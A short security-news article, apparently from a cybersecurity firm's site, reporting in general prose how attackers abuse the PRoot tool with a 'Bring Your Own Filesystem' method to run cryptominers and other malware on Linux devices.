HQ/EMEAFind out how we can help your business
Threat actors are currently exploiting the PRoot open-source tool to target Linux-based devices. The attack process from this tool gives the adversaries consistent toolsets to target all devices supported by Linux since this kit is compatible with multiple Linux distributions.
The PRoot toolkit is a user-specific implementation of some set of commands. In addition, it is statically compiled and does not require dependencies. This tool could also deliver malicious codes by packing them with required executables and packages into a filesystem.
Threat actors could run different attack paths to install and operate cryptominers, establish persistence mechanisms, or run additional malware. The tool is also easy to use and removes the environment setup, executable compatibility, and miner execution.
The threat actor has also employed a new strategy that complements the PRoot open-source tool.
Based on reports, the threat actors use a new method called ‘Bring Your Own Filesystem’ that accompanies that PRoot open-source tool to run sophisticated attacks.
In this strategy, miscreants create a compromised filesystem with all dependencies, tools, malware, and other necessary artefacts on their system. This hostile filesystem is packed in a gzip-compressed tar file.
Subsequently, the packages are placed either on well-known storage platforms or the attacker’s local device. It could also be put on by threat actors on any other legitimate websites that are commonly accessible from a target’s internal network.
Once the adversaries obtain access to a targeted system, they could download the malicious filesystem package with the PRoot. Next, they unpack the filesystem in a folder and extract and operate the PRoot executable towards that folder.
The infected system then operates commands from the threat actor’s filesystem instead of the default filesystem. Hence, the controls let the attackers run payloads without worrying about getting detected.
Cybersecurity experts are currently observing the upward trend of threat actors that abuse open-source tools for their malicious activities. Now, the attackers have leveraged the PRoot by downloading the precompiled binary from GitLab and running it in BYOF campaigns.
The PRoot open-source tool will surely get the attention of many threat groups soon, but cryptominers are still the most exploited tool for running a campaign.
